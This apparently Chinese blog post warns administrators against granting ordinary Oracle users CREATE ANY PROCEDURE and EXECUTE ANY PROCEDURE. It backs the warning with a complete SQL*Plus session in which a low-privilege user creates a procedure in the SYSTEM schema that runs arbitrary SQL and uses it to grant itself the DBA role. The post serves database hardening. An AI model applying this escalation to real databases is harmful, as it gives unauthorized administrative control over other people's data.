??給一般用戶授 create any procedure、execture any procedure 這2個權限是很不安全的事。
因為授權后,通過一些處理,該用戶可以取得dba權限,請一定注意。
?
下面是實驗過程:
SQL> create user hacker identified by bbk;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant create any procedure,execute any procedure to hacker;
Grant succeeded.
?
?
SQL> conn hacker/bbk
Connected.
SQL> show user
USER is "HACKER"
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
?
SQL> create procedure system.h1(h1_str in varchar2) as
2 begin
3 execute immediate h1_str;
4 end;
5 /
Procedure created.
?
SQL> execute system.h1('grant dba to hacker');
PL/SQL procedure successfully completed.
?
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
UNLIMITED TABLESPACE
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
?
SQL> conn hacker/bbk
Connected.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER
...................................
161 rows selected.
?
SQL> select * from session_roles;
ROLE
------------------------------
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
?
?
更多文章、技術交流、商務合作、聯(lián)系博主
微信掃碼或搜索:z360901061
微信掃一掃加我為好友
QQ號聯(lián)系: 360901061
您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對您有幫助就好】元
